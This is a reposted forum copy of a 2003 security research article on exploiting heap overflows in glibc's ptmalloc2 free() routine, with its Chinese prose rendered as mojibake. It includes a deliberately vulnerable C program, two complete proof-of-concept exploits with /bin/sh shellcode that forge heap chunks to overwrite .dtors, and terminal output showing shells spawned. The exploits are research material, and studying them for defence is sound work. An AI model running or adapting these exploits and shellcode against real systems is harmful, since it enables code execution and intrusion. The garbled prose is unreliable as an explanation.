Ê×Ò³ > ѧ¼¼Êõ > ¼¼ÊõÍøÎÄ > ÍøÂ簲ȫ > ÕýÎÄ

[±£Áô] ptmalloc2µÄ¶ÑÒç³öÀûÓóõ̽(zz)

À´Ô´ chinaunix.net ¿áÇÚÍøÕûÀí

¿´µÄÎÒֱ𺹰¡ :em06: ... ...


ptmalloc2µÄ¶ÑÒç³öÀûÓóõ̽


By backend at nsfocus.com
Date: 2003-09-16


¡ï Ä¿Â¼

¡¡¡¡ÆðÒò
¡¡¡¡Ô­Òò
¡¡¡¡·ÖÎö
¡¡¡¡Í»ÆÆ
¡¡¡¡´úÂë
¡¡¡¡ÀýÍâ
¡¡¡¡½áÊø
¡¡¡¡²Î¿¼


¡ï ÆðÒò

ÏÈ¿´Ò»Ï±¾ÎĵÄ©¶´³ÌÐò£º

#include <stdio.h>;
#include <stdlib.h>;
#include <unistd.h>;

int foo(char *s1,char *s2)
{
        strcpy(s1,s2);
        printf("input:%s\r\n",s1);
        return 0;
}

main(int argc,char **argv)
{
        char *p1;
        char *p2;

        if(argc<2)
        {
                printf("Usage:%s <string>;\n",argv[0]);
                exit(0);
        }
        if(strlen(argv[1])>;100-1)
        {
                printf("ERROR:too long\n");
                exit(0);
        }
        p1=(char *)malloc(20);
        p2=(char *)malloc(100);
        memset(p1,0,20);
        memset(p2,0,100);
        strcpy(p2,argv[1]);
        foo(p1,p2);
        free(p1);
        free(p2);
        printf("END.\n");
        exit(0);
}

$ gcc -o heapvul heapvul.c

¶ÔÓھɰ汾µÄglibc¿â£¬´úÂë²ÉÓõÄÊÇDoug LeaµÄmallocʵÏÖ£¬Òò´Ë¹¥»÷ÊǷdz£¼òµ¥µÄ¡£
¸ù¾Ýwarning3ÔÚ2001Äê³õ·¢±íµÄ¡¶Ò»ÖÖеÄHeapÇøÒç³ö¼¼Êõ·ÖÎö¡·
£¨http://magazine.nsfocus.net/index.php?act=magazine&do=view&mid=847£©£¬ºÜÈÝ
Ò×¾ÍÄÜд³öÒÔϹ¥»÷´úÂ룺

/* Compile: gcc -o ex1 ex1.c */

#include <stdio.h>;
#include <stdlib.h>;

#define __FREE_HOOK     0x40163700
#define VULPROG "./heapvul"

#define PREV_INUSE 0x1
#define IS_MMAPPED 0x2

char shellcode[] =
  "\xeb\x0a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

main (int argc, char **argv)
{
  unsigned int codeaddr = 0;
  char buf[40], fake_chunk[16];
  char *env[2];
  unsigned int *ptr;

  codeaddr = 0xc0000000 - 4 - (strlen (VULPROG) + 1) - (strlen (shellcode) + 1);

  env[0] = shellcode;
  env[1] = NULL;

  /* Î±ÔìÒ»¸ö¿é½á¹¹ */
  ptr = (unsigned int *) fake_chunk;
  *ptr++ = 0x11223344 & ~PREV_INUSE; /* ½«PREV_INUSEλÇåÁã */
  /* ÉèÖó¤¶ÈΪ-4,Õâ¸öÖµÓ¦µ±ÊÇ4µÄ±¶Êý */
  *ptr++ = 0xfffffffc;
  *ptr++ = __FREE_HOOK - 12 ;
  *ptr++ = codeaddr;

  bzero(buf, 40);
  memset (buf, 'A', 16); /* Ìî³äÎÞÓÃÊý¾Ý */
  memcpy (buf + 16, fake_chunk, sizeof (fake_chunk));

  execle (VULPROG, VULPROG, buf, NULL, env);

} /* End of main */

[backend@redhat72 nsfocus]$ uname -a
Linux nsfocus 2.4.7-10 #1 Thu Sep 6 17:27:27 EDT 2001 i686 unknown
gcc -o ex1 ex1.c
[backend@redhat72 nsfocus]$ ./ex1
input:AAAAAAAAAAAAAAAAD3"?ÿÿ?@?ÿ?
sh-2.05$

µ«ÊÇÉÏÃæÕâ¶Î´úÂëÔÚRed Hat 8ϵͳÉϲ»Äܳɹ¦£º

[backend@redhat8 nsfocus]$ gcc -o ex1 ex1.c
input:AAAAAAAAAAAAAAAAD3"?ÿÿ°aB?ÿ?
Segmentation fault (core dumped)


¡ï Ô­Òò

ÕâÊÇÒòΪÔÚа汾µÄglibc¿âÖжÑÄÚ´æ¹ÜÀí²ÉÓÃÁËWolfram GlogerµÄptmalloc/ptmalloc2
´úÂë¡£ptmalloc2´úÂëÊÇ´ÓDoug LeaµÄ´úÂëÒÆÖ²¹ýÀ´µÄ£¬Ö÷ҪĿµÄÊÇÔö¼Ó¶Ô¶àỊ̈߳¨ÓÈÆä
ÊÇSMPϵͳ£©»·¾³µÄÖ§³Ö£¬Í¬Ê±½øÒ»²½ÓÅ»¯ÁËÄÚ´æ·ÖÅä¡¢»ØÊÕµÄËã·¨¡£

ÓÉÓÚÔÚptmalloc2ÖÐÒýÈëÁËfastbins»úÖÆ£¬malloc()/free()Òç³öÔÚijЩÌõ¼þÏ»áÊܵ½¸ü
¶àµÄÏÞÖÆ£¬ËäÈ»×÷Õߵı¾Òâ²¢²»ÊÇÕë¶ÔÒç³ö¹¥»÷¡£ÓÉÓÚfastbinsÊǵ¥ÏòÁ´±íÊý×飬ÿһ
¸öfastbinÊÇÒ»¸öµ¥ÏòÁ´±í£¬Âú×ãfastbinsÌõ¼þµÄÄÚ´æ¿é»ØÊÕʱ½«±»·ÅÈëÏàÓ¦µÄfastbin
Á´±íÖУ¬ÒÔ±ãÔÚÒÔºóµÄ
ÄÚ´æÉêÇëʱÄܸü¿ìµØÔÙ±»·ÖÅä³öÈ¥£¬´Ó¶øÌá¸ßÐÔÄÜ¡£Òò´ËÒªÀûÓÃptmalloc2µÄ¶ÑÒç³ö£¨Ö¸
free()µ÷Óã¬ÒÔÏÂͬ£©£¬Ê×ÏȱØÐëÈƹýfastbins»úÖÆ¡£

³ý´ËÖ®Í⣬free()µÄʵÏÖ´úÂëÓë¾É°æ±¾µÄÒ²Óв»Í¬£¬fake_chunksµÄ´´½¨ºÍÀûÓÃÒ²±ØÐëÓÐ
Ëù¸Ä±ä¡£ÏÂÃæ¾Í¿ªÊ¼Õë¶ÔÔ´´úÂëÖÐfree()µÄ¸÷ÖÖ¼ì²éÌõ¼þÀ´Ì½Ë÷¡£


×¢Ò⣡£¡£¡ÔÚ¼ÌÐøÔĶÁÒÔÏÂÄÚÈÝ֮ǰ£¬ÇëÈ·±£ÄãÒѾ­Á˽âwarning3µÄ¡¶Ò»ÖÖеÄHeapÇø
Òç³ö¼¼Êõ·ÖÎö¡·ÖÐËùÉæ¼°µÄ֪ʶ£¬ÓÈÆäÊÇchunkµÄ½á¹¹ºÍunlinkµÄ²Ù×÷£¬·ñÔòÄãÒ²Ðí»á
¾õµÃÓеãÔÎͷתÏò¡££»£©


¡ï ·ÖÎö

Òª´ïµ½ÀûÓÃfree()º¯Êýµ÷ÓÃÀ´¹¥»÷µÄÄ¿µÄ£¬ÐèÒªÂú×ãÒÔÏÂÌõ¼þ£º

1¡¢Í¨¹ýijЩ©¶´£¨ÀýÈç¶ÑÒç³ö£©À´¸²¸Ç½«Òª±»free()µÄchunk
2¡¢ÔÚ±»¸²¸ÇchunkµÄλÖÃÉϹ¹Ôìfake_chunk
3¡¢fake_chunkҪȷ±£ÔÚfree()º¯Êýµ÷Óùý³ÌÖÐÔËÐÐunlinkºê
4¡¢unlinkºêËù²Ù×÷µÄÄڴ潫Ð޸ijÌÐòµÄÁ÷³Ì

ÔÚÉÏÃæµÄheapvul.c³ÌÐòÖУ¬ÓÉÓÚp1Ö¸ÏòµÄÊÇmalloc(40)Äڴ棬Õâ¿éÄÚ´æÔÚfree()»ØÊÕ
ʱÓÉÓÚÂú×ãfastbinsÌõ¼þ¶ø±»Ö±½Ó·ÅÈëij¸öfastbinÁ´±íÖУº

    /*
      If eligible, place chunk on a fastbin so it can be found
      and used quickly in malloc.
    */

    if ((unsigned long)(size) <= (unsigned long)(av->;max_fast)    // Âú×ãfastbinsÌõ¼þ

#if TRIM_FASTBINS
        /*
           If TRIM_FASTBINS set, don't place chunks
           bordering top into fastbins
        */
        && (chunk_at_offset(p, size) != av->;top)
#endif
        ) {

      set_fastchunks(av);
      fb = &(av->;fastbins[fastbin_index(size)]);                  // ´Ë´¦ÈýÐдúÂ뽫ÄÚ´æ¿é²åÈëÏàÓ¦fastbinÁ´±í
      p->;fd = *fb;
      *fb = p;
    }

¶øÒòΪp1µÄchunk½á¹¹Í·²¿ÎÒÃÇÎÞ·¨¿ØÖÆ£¬ËùÒÔfree(p1)ÊÇÀûÓò»ÁËÁË¡£
ÄÇôfree(p2)ÄØ£¿£¿£¿


¡ï Í»ÆÆ

ÓÉÓÚͨ¹ýÀûÓÃp1Ö¸ÏòµÄÄÚ´æ¿é¹ýСÇÒûÓб߽ç¼ì²é£¬ÎÒÃÇÄܹ»¸²¸Ç£¨¿ØÖÆ£©p2ËùÖ¸ÏòÄÚ
´æ¿éµÄchunk½á¹¹Í·²¿£¬Ò²¾ÍÊÇ˵free(p2)ʱµÄ²Ù×÷½«ÒÀÀµÓÚ¸²¸ÇÄÚÈÝ£¬¼´Âú×ãÁ˵Ú1¡¢
2¸öÌõ¼þ¡£Òò´ËÎÒÃÇÖ»Òª¾«ÐĹ¹Ôìfake_chunk£¬¾ÍÍêÈ«ÓпÉÄÜÂú×ãµÚ3¡¢4¸öÌõ¼þ£¬´Ó¶ø
ʹ¹¥»÷³É¹¦¡£

·ÖÎö_int_free()£¨free()µÄÕæÕýʵÏÖ´úÂ룩£º

A£©£¨´úÂë¼ûÉÏÃ棬£©Ê¹p2²»Âú×ãfastbinsÌõ¼þ

¡¡¡¡¼´£ºfake_chunk->;size >; 72£¨av->;max_fastȱʡֵ£©                       <--- A

B£© else if (!chunk_is_mmapped(p)) {
      nextchunk = chunk_at_offset(p, size);
      nextsize = chunksize(nextchunk);
      assert(nextsize >; 0);

¡¡¡¡¼´£ºfake_chunk->;size & IS_MMAPPED == 0¡¡£¨#define IS_MMAPPED 0x2£©    <--- B1
¡¡¡¡¡¡¡¡(fake_chunk+size)->;size >; 0                                       <--- B2

C£© ½ÓÏÂÀ´£º

      /* consolidate backward */
      if (!prev_inuse(p)) {
        prevsize = p->;prev_size;
        size += prevsize;
        p = chunk_at_offset(p, -((long) prevsize));
        unlink(p, bck, fwd);                                       /* #1 */
      }

      if (nextchunk != av->;top) {
        /* get and clear inuse bit */
        nextinuse = inuse_bit_at_offset(nextchunk, nextsize);             <--- @_@

        /* consolidate forward */
        if (!nextinuse) {
          unlink(nextchunk, bck, fwd);                             /* #2 */
          size += nextsize;
        } else
      clear_inuse_bit_at_offset(nextchunk, 0);

        /*
          Place the chunk in unsorted chunk list. Chunks are
          not placed into regular bins until after they have
          been given one chance to be used in malloc.
        */

        bck = unsorted_chunks(av);
        fwd = bck->;fd;
        p->;bk = bck;                                               /* #3 */
        p->;fd = fwd;
        bck->;fd = p;
        fwd->;bk = p;

        set_head(p, size | PREV_INUSE);
        set_foot(p, size);

        check_free_chunk(av, p);
      }

¿ÉÒÔ¿´µ½ÓÐÁ½¸öµØ·½µ÷ÓÃÁËunlink¡£µÚÒ»¸öunlink£¨#1£©µÄÌõ¼þÊÇÇ°Ò»ÄÚ´æ¿éδ±»Ê¹
Óã¬ÓÉÓÚPREV_INUSE¾ÍÔÚµ±Ç°ÄÚ´æ¿éµÄsizeÖУ¬Ëƺõ×îÈÝÒ׿ØÖÆ£¬µ«ÓÉÓÚºóÃ滹ÓÐÒ»¶Î
´úÂ루#3£©£¬Õâ¶Î´úÂ뻹»áÔÙÒ»´ÎÐÞ¸ÄÒѾ­±»ÎÒÃÇ£¨Í¨¹ýunlink²Ù×÷£©¸ÄдµÄÄڴ棨
×¢£ºÔÚÕâÀïÖ÷ÒªÊÇshellcodeµÄÈë¿Ú»á±»bck¸²¸Ç£©¡£Òò´ËÎÒÃÇ°ÑÄ¿±êתÏòµÚ¶þ¸öunlink
£¨#2£©£¬ËüÒªÇóÂú×ãÁ½¸öÌõ¼þ£º

¡¡¡¡nextchunk²»ÊÇtop¿é£¨¶Ñ±ß½ç£©£¬Õâ¸ö¾ø´ó¶àÊýÇé¿ö϶¼·ûºÏ£»

¡¡¡¡ÏÂÒ»¸öchunk¿éδ±»Ê¹Ó㬼´ÔÙÏÂÒ»chunk¿éµÄPREV_INUSEλΪ0¡£             <-- C

ÖÁ´Ë£¬Èç¹ûÉÏÊöÌõ¼þ¶¼ÄÜÂú×㣬Ôò½«µ÷Óõ½unlink£¬´Ó¶øÐÞ¸ÄÎÒÃÇÖ¸¶¨µÄÄڴ棨עÒ⣬
µØÖ·ÓÉÏÂÒ»¸öchunk¿éµÄfd/bkÖ¸Õë¾ö¶¨£¡£©¡£
ÏÂÃæ¸Ã×öµÄ¾ÍÊÇÒ»²½²½µØÈ·¶¨ÈçºÎ¹¹Ôì¸÷¸öfake_chunkÁË£º

Ê×ÏÈ£¬ËùÓеÄfake_chunk¶¼²»Äܺ¬ÓÐÁã×Ö·û£¬·ñÔò»áÓöµ½×Ö·û´®½Ø¶ÏÎÊÌ⡣ͬʱËùÓÐ
fake_chunkµÄIS_MMAPPEDλ¾ùΪÁã¡££¨Âú×ãÌõ¼þB1£©

£¨fake_chunk1¼´free(p2)ʱÊ×Ïȼì²éµÄchunk£¬Æä×÷ÓÃÊÇÈÃ_int_free()¼ÆËã³ö
fake_chunk2µÄλÖᣣ©
µÚÒ»£¬fake_chunk1->;pre_size£¨PSZ1£©£¬ÔÝʱûÓÐÒªÇ󣨵±È»×îºÃ¶ÔÆ룩¡£
µÚ¶þ£¬fake_chunk1->;size£¨SZ1£©Òª´óÓÚ72£¨max_fast£©£»Í¬Ê±PREV_INUSEλÖÃ1£¬ÒÔ
¡¡¡¡¡¡Ê¹#1µÄunlink²»±»´¥·¢£¨ÕâÑùÎÒÃǾͲ»Óÿ¼ÂÇPSZ2ÁË£»£©£©¡£
µÚÈý£¬fake_chunk1->;fd£¨FD1£©£¬ÔÝʱûÓÐÒªÇ󣨵±È»×îºÃ¶ÔÆ룩¡£
µÚËÄ£¬fake_chunk1->;bk£¨BK1£©£¬Í¬FD1¡£

£¨fake_chunk2µÄ×÷ÓÃÖÁ¹ØÖØÒª£¬Ëü½«Ê¹unlink¡°ºÏ·¨¡±µØÊÍ·Å×Ô¼º£¬¼´ÐÞ¸ÄÄڴ棡£©
µÚÎ壬fake_chunk2->;pre_size£¨PSZ2£©£¬Í¬PSZ1¡£
µÚÁù£¬fake_chunk2->;size£¨SZ2£©£¬ÒªÇóSZ>;0ÇÒ(fake_chunk2+SZ2)->;size & PREV_SIZE
¡¡¡¡¡¡ÎªÁã¡£
µÚÆߣ¬fake_chunk2->;fd£¨FD2£©£¬Ö¸ÏòÒªÐÞ¸ÄÄÚ´æµÄµØÖ·-12¡£
µÚ°Ë£¬fake_chunk2->;bk£¨BK2£©£¬Ö¸Ïòshellcode¡£

½Ó×Å£¬ÎÒÃÇÒª½øÒ»²½È·¶¨¸÷¸ö×ֶεÄÊýÖµ£º

¶ÔÓÚPSZ1ºÍPSZ2£¬È¡ÖµÈ磺0x11223344

¶ÔÓÚSZ1£¬ÓÉÓÚfake_chunk2µÄ¶¨Î»ÒÀÀµÓÚSZ1£¬
¡¡¡¡Èç¹ûÈ¡ÕýÖµ£¬»áºÜ´ó£¨ÒòΪ¸÷×Ö½Ú²»ÄÜΪÁ㣩£¬¿ÉÒÔÈ¡Êʵ±ÖµÊ¹fake_chunk1+SZ1
λÓÚ¶ÑÕ»µÄ»·¾³±äÁ¿ÖУ¬È»ºó°Ñfake_chunk2ͨ¹ý»·¾³±äÁ¿Êä³ö¡£ÕâÑùÓÐÒ»¸öȱµãÊDz»
ÈÝÒ׶¨Î»£¬ÒòΪ²»Äܾ«È·¶¨Î»fake_chunk1µØÖ·£¬Ö»ÄÜͨ¹ý²Â²â¡£
¡¡¡¡Èç¹ûÈ¡¸ºÖµÄØ£¿£¿£¿ÎÒÃÇ¿ÉÒԻعýÍ·À´ÔÙ¿´¿´_int_free()µÄ´úÂ룬¿ÉÒÔ¾ªÆæµØ·¢
ÏÖ¾ÓÈ»ÊÇÔÊÐíµÄ£¡£¡£¡ºÇºÇ£¬ÕâÑù¾ÍºÃ°ìÁË¡£ÎÒÃÇ¿ÉÒÔ°Ñfake_chunk2·Åµ½fake_chunk1
Ç°Ã棡SZ1È¡Öµ0xfffffff0£¨-16£©¡££¨Âú×ãÌõ¼þA£©

¶ÔÓÚFD1ºÍBK1£¬È¡ÖµÈ磺0x08080808

¶ÔÓÚSZ2£¬Õ§¿´Ö®Ï¿ÉÒÔÈÎÒâÈ¡Öµ£¬Ö»Òª(fake_chunk2+SZ2)->;size & PREV_SIZEΪÁã¼´
¿É£¨Å¼µ±Ê±µ÷ÊÔʱÖ÷Òª¾Í¿¨ÔÚÕâÀ£¬Æäʵ²»È»¡£ÔÚ@_@´¦µÄ´úÂëÊǶÁÄÚ´æ²Ù×÷£¬Èç¹û
ÄÚ´æÒ³Ãæ²»´æÔÚ£¬»áµ¼ÖÂȱҳÒì³£¡£Òò´ËÎÒ¾ö¶¨ÈÃfake_chunk2+SZ2Ö¸ÏòÒ»¸ö±ØÈ»´æÔÚ
ÄÚ´æÒ³±íµÄ¿Õ¼ä£­£­Óû§¶ÑÕ»µÄ×î¸ßÒ»Ò³£¨¼´0xbffff000-0xbfffffff£©£¬¼´SZÈ¡Öµ
(0xbffff800 - bss_addr)¡££¨Âú×ãÌõ¼þB2ºÍÌõ¼þC£©

¶ÔÓÚFD2£¬ÓÉÓÚ¿ÉÒÔÀûÓõÄÄÚ´æµØÖ·ºÜ¶à£¬ÎÒÕâÀïÑ¡ÔñµÄÊǾ²Ì¬È·¶¨µÄ.dtors¶Î£¬¼´FD
È¡Öµ(dtors_addr + 4 - 12)¡£

¶ÔÓÚBD2£¬Óû·¾³±äÁ¿Êä³öshellcodeÊÇ×îÈÝÒ×È·¶¨µØÖ·µÄ·½·¨Ö®Ò»¡£

ÏÖÔÚ£¬ÎÒÃÇ¿ÉÒÔ»­³öαÔìÇ°ºóµÄÄÚ´æ·Ö²¼Ê¾ÒâͼÁË£º

+->; ¿é1                                   +->; ¿é2                    
|                                         |
+----------------+------------------------+----------------------------+
|prev_size| size |        16bytes         |prev_size2| size2 |ÈÎÒâÊý¾Ý
+----------------+------------------------+----------------------------+


+----------------+------------------------+----------------------------+
|prev_size| size | PSZ2 | SZ2 | FD2 | BK2 | PSZ1 | SZ1 | FD1 | BK1 | 
+----------------+------------------------+----------------------------+
                 |                        |
                 +->; fake_chunk2          +->; fake_chunk1


¡ï Òç³ö´úÂë

/* Concept-of-proof exploit for free() @ Wolfram Gloger's ptmalloc2
*
*  By backend at nsfocus.com (http://www.nsfocus.com) 
*  Date: 2003-09-15
*
*  Compile: gcc -o ex2 ex2.c -lbfd
*/
#include <stdio.h>;
#include <stdlib.h>;
#include <bfd.h>;
#include <strings.h>;
#include <linux/elf.h>;

#define VULPROG "./heapvul"

#define PREV_INUSE 0x1
#define IS_MMAPPED 0x2

#define bfd_error(s)    { bfd_perror(s); exit(-1); }

unsigned int bss_addr, dtors_addr;

void GetBfdInfo ()
{
        bfd                     *abfd;
        asection        *asec;

        bfd_init ();

        abfd = bfd_openr (VULPROG, NULL);
        if (!abfd) bfd_error("openr");

        if (!bfd_check_format (abfd, bfd_object))
                bfd_error("object format");

        asec = bfd_get_section_by_name (abfd, ".bss");
        if (!asec) bfd_error(".bss section");
        bss_addr = (unsigned int)(asec->;vma);

        asec = bfd_get_section_by_name (abfd, ".dtors");
        if (!asec) bfd_error(".dtors section");
        dtors_addr = (unsigned int)(asec->;vma);

        bfd_close (abfd);
}

char shellcode[] =
  "\xeb\x0a\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

main (int argc, char **argv)
{
  unsigned int codeaddr = 0;
  char buf[40], fake_chunks[40];
  char *env[2];
  unsigned int *ptr;

  codeaddr = 0xc0000000 - 4 - (strlen (VULPROG) + 1) - (strlen (shellcode) + 1);

  env[0] = shellcode;
  env[1] = NULL;

  GetBfdInfo ();

  bzero(fake_chunks, 40)
  ptr = (unsigned int *)fake_chunks;
  *ptr++ = 0x11223344;    /* garbage */
  *ptr++ = (0xbffff800 - bss_addr) & ~(IS_MMAPPED | PREV_INUSE);
  *ptr++ = dtors_addr + 4 - 12;
  *ptr++ = codeaddr;
  *ptr++ = 0x11223344;    /* garbage */
  *ptr++ = -16 | PREV_INUSE & ~IS_MMAPPED;
  /* garbage
  *ptr++ = 0x08080808;
  *ptr++ = 0x08080808;
  */
  
  bzero(buf, 40);
  memcpy (buf, fake_chunks, sizeof (fake_chunks));

  execle (VULPROG, VULPROG, buf, NULL, env);

} /* End of main */

[backend@redhat8 nsfocus]$ gcc -o ex2 ex2.c -lbfd
[backend@redhat8 nsfocus]$ ./ex2
input:D3"`û·¨¸ÿÿŸm3"?ÿÿ
END.
sh-2.05b$


¡ï ÀýÍâ

  ptr = (unsigned int *)fake_chunks;
  *ptr++ = 0x11223344;
  *ptr++ = (0xbffff800 - bss_addr) & ~(IS_MMAPPED | PREV_INUSE);
  *ptr++ = dtors_addr + 4 - 12;
  *ptr++ = codeaddr;
  *ptr++ = 0x11223344;
  *ptr++ = -16 | PREV_INUSE & ~IS_MMAPPED;

ÉÏÃæ¸ø³öµÄ´úÂëÓм¸¸ö¿ÉÄܵ¼ÖÂʧ°ÜµÄµØ·½£­£­

bbs_addr£¡£¡£¡
dtors_addr£¡£¡£¡
codeaddr£¡£¡£¡

ÆäÖÐÇ°Á½¸öÖµÊDZàÒëºó¾²Ì¬£¨Ö±½Ó´ÓÎļþÍ·¶ÁÈ¡£©£¬¶øcodeaddr¶ÔÓڹ̶¨ÏµÍ³À´ËµÒ²Êǹ̶¨²»±äµÄ¡£
µ±ÕâÈý¸öµØÖ·ÖµÖÐÖ»ÒªÔÚ¼ÆËã½á¹ûºó´æÔÚÒ»¸ö00£¨¼´Áã×Ö·û£©£¬¾Í»áµ¼ÖÂ×Ö·û´®¿½±´½Ø¶ÏÎÊÌ⣡£¡£¡

ÔÚÎÒµÄRH8²âÊÔ»úÉÏ£¬Î´¼Ómemset(p2,0,100)ʱ£º
bss_addr at: 0x8049734
dtors_addr at 0x80496f8
fake_chunks len: 24
Òç³ö³É¹¦¡£

µ±¼ÓÉÏmemset(p2,0,100)ʱ£º
bss_addr at: 0x8049744
dtors_addr at 0x8049708
fake_chunks len: 8
Òç³öʧ°Ü£¡

¿´µ½ÁËÂð£¿dtors_addrµÄ×îµÍ×Ö½ÚΪ08£¬dtors_addr + 4 - 12 = 0x8049700£¬ËùÒÔµ¼ÖÂ
fake_chunksµÄ×Ö·û´®³¤¶ÈÖ»ÓÐ8ÁË£¡£¡£¡

ÑéÖ¤£ºÐÞ¸ÄÈÎÒâÎÞ¹ØÖ¸ÁÀýÈçɾ³ýprinf()¡¢Ôö¼Óprintf()£©¡£ÀýÈçÔÚÎҵIJâÊÔ»úÉÏ°Ñ
printf("END.\n");
¸ÄΪ£¨»òɾ³ýÒ²ÐУ©£º
printf("END.");
printf("\n");
ºó£¬ÖرàÒëÔËÐнá¹û£º
bss_addr at: 0x8049754
dtors_addr at 0x8049718
fake_chunks len: 24
input:D3"¬`û·?ÿ¿D3"?ÿÿ
END.
sh-2.05b$

ç¹ûÎÞ·¨ÐÞ¸ÄÔ´´úÂëµÄÄØ£¿Ò²»¹ÓкܶàÖÖ¿ÉÑ¡·½°¸£¬ÀýÈçÐÞ¸ÄGOT¡¢Ð޸ĺ¯ÊýÖ¸Õë¡¢ÐÞ¸Ä
EBP¡¢Ð޸ĺ¯Êý·µ»ØµØÖ·£¬µÈµÈ¡£µ±È»ÄѶȿÉÄܾͲ»Ò»¶¨Ò»ÑùÁË¡£


¡ï ½áÊøÓï

ÉÏÃæ¼òµ¥½éÉÜÁËÔÚа汾glibcÏÂÈçºÎͨ¹ýfree()µ÷ÓÃÀ´ÀûÓöÑÒç³ö¡£¿ÉÒÔ¿´µ½ÓÉÓÚÒý
ÈëÁËfastbins»úÖÆ£¬malloc/freeµÈµ÷ÓûáËæ¾ßÌåÇé¿ö²»Í¬¶ø¿ÉÄÜÂÔÓвîÒì¡£ÀýÈ磬
free()Ò»¿élarge chunkÓëÒ»¿ésmall chunkÊDz»Ò»ÑùµÄ£¬¼´Ê¹¶¼ÊÇsmall chunk£¬»¹ÓÐ
ÊÇ·ñÊôÓÚfastbinsÖ®·Ö£¬µÈµÈ¡£¶ø¶ÔÓÚexploit°®ºÃÕߣ¬Éè¼Æ¹¹Ôìfake_chunksÒ²ºÜÓÐ
ÀÖȤ¡£ÈçºÎÔڰѶѷŵ½Õ»ÖУ¿£»£©ÈçºÎαÔìchunk½á¹¹£¿¸²¸ÇÄÄЩµØÖ·£¿ÈçºÎµ÷ÊÔ£¿
¡­¡­¡­¡­ÕâЩÎÊÌâ¾ÍÁô¸ø¸ÐÐËȤµÄ¶ÁÕß°É¡£

ÔÚ¼´½«Ð´ÍêÕâƪ¶«¶«Ö®¼Ê£¬·¢ÏÖbkbllÔÚ2003Äê9Ô³õÒ²·¢±íÁËһƪÑо¿ÏàͬÎÊÌâµÄÎÄÕÂ
¡¶Ò»ÖÖС¶Ñ(heap)Òç³öµÄÁíÀàÀûÓ÷½·¨¡·
£¨http://www.nsfocus.net/index.php?act=sec_doc&do=view&doc_id=867£©¡£²»·Á¶Ô
ÕÕ×ÅÑо¿£¬Ò²Ðí»áÓÐеķ¢ÏÖ¡£



¡ï ²Î¿¼ÎÄÏ×

[1] warning3, <<Ò»ÖÖеÄHeapÇøÒç³ö¼¼Êõ·ÖÎö>;>;
    http://magazine.nsfocus.net/index.php?act=magazine&do=view&mid=847

[2] Doug Lea, <<A Memory Allocator>;>;
    http://gee.cs.oswego.edu/dl/html/malloc.html

[3] Wolfram Gloger, ptmalloc2 source code
    http://www.malloc.de/malloc/ptmalloc.tar.gz


 watercloud »Ø¸´ÓÚ£º2004-07-14 09:33:53

ÕâÀïÒÔÇ°ÏêϸµÄÌÖÂÛ¹ý£¬¿ÉÒԲο¼£º

https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28184&page=all

https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28202&page=all

 watercloud »Ø¸´ÓÚ£º2004-07-14 09:38:12

»¹ÓÐһƪÏà¹ØÎÄÕ£º
http://www.cnhonker.com/index.php?module=articles&act=view&type=6&id=76

 watercloud »Ø¸´ÓÚ£º2004-07-15 20:37:42

²Î¿¼Á´½Óд´íÁË :)
¸Õ¸Õ¸ÄÕý :- )

https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28184&page=all 

https://www.xfocus.net/bbs/index.php?act=ST&f=19&t=28202&page=all

 ayazero »Ø¸´ÓÚ£º2004-07-16 17:25:46

¿ÉÁ¯ÏÖÔÚµÄʱ¼äÔ½À´Ô½ÉÙ~




Ô­ÎÄÁ´½Ó£ºhttp://bbs.chinaunix.net/viewthread.php?tid=365489
תÔØÇë×¢Ã÷×÷ÕßÃû¼°Ô­Îijö´¦



Êղر¾Ò³µ½£º ¡¡¡¡¡¡¡¡¡¡